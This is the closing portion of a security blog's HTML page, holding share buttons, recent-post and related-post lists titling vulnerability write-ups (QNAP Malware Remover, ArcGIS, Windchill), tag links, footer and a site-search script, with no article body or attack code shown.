      <a href="https://www.facebook.com/sharer/sharer.php?title=CVE-2025-11837%20Deep%20Dive%20Python%20Code%20Injection%20Vulnerability%20in%20QNAP%20Malware%20Remover%20-%20imjdl%20blog&u=%2Fposts%2Fblog_cve_2025_11837_en%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=%2Fposts%2Fblog_cve_2025_11837_en%2F&text=CVE-2025-11837%20Deep%20Dive%20Python%20Code%20Injection%20Vulnerability%20in%20QNAP%20Malware%20Remover%20-%20imjdl%20blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_9181_arcgis_cn/">CVE-2026-9181：Esri ArcGIS Server 路径遍历漏洞分析</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_9181_arcgis_en/">CVE-2026-9181 Path Traversal in Esri ArcGIS Server</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_12569_cn/">CVE-2026-12569 深度分析：PTC Windchill 未授权反序列化 RCE</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2026_12569_en/">CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/blog_cve_2025_11837_cn/">CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">CVE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">RCE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98/">空间测绘</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/fortigate/">Fortigate</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ivanti/">IVanti</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/mcp/">MCP</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/palo-alto-networks-pan-os/">Palo-Alto-Networks-PAN-OS</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/showdoc/">ShowDoc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/simplehelp/">SimpleHelp</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/blog_cve_2026_9181_arcgis_en/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1783917240"
  data-df="ll"
  
>
  Jul 13, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2026-9181 Path Traversal in Esri ArcGIS Server</h4>
              <div class="text-muted">
                <p>Background

CVE-2026-9181 is a path traversal vulnerability (CWE-22) in Esri ArcGIS Server. The CVSS v3.1 score is 9.8, network-reachable, with no authentication and no user interaction. The offici...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/blog_cve_2026_9181_arcgis_cn/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1783917240"
  data-df="ll"
  
>
  Jul 13, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2026-9181：Esri ArcGIS Server 路径遍历漏洞分析</h4>
              <div class="text-muted">
                <p>背景

CVE-2026-9181 是 Esri ArcGIS Server 的一个路径遍历漏洞（CWE-22）。CVSS v3.1 评分 9.8，网络可达、无需认证、无需用户交互。官方公告描述的危害是攻击者可”覆盖敏感文件”并获得”完全的管理访问权限”。

ArcGIS Server 是 Esri 的 GIS（地理信息系统）服务端产品，负责发布地图服务、地理处理服务（GP 服务）等，广泛部...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/blog_cve_2026_12569_en/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1783485240"
  data-df="ll"
  
>
  Jul  8, 2026
</time>

              <h4 class="pt-0 my-2">CVE-2026-12569 Deep Dive Unauthenticated Deserialization RCE in PTC Windchill</h4>
              <div class="text-muted">
                <p>Background

First, a word on the product. PTC Windchill is a product lifecycle management (PLM) system used in manufacturing and heavy industry, managing the full data chain from design through eng...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/blog_cve_2025_11837_cn/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞</p>
    </a>
  

  
    <a
      href="/posts/blog_cve_2026_12569_cn/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>CVE-2026-12569 深度分析：PTC Windchill 未授权反序列化 RCE</p>
    </a>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2026</time>

    
      <a href="https://twitter.com/Mortyjin">Mortyjin</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cve/">CVE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/rce/">RCE</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98/">空间测绘</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/fortigate/">Fortigate</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ivanti/">IVanti</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/mcp/">MCP</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/palo-alto-networks-pan-os/">Palo-Alto-Networks-PAN-OS</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/showdoc/">ShowDoc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/simplehelp/">SimpleHelp</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

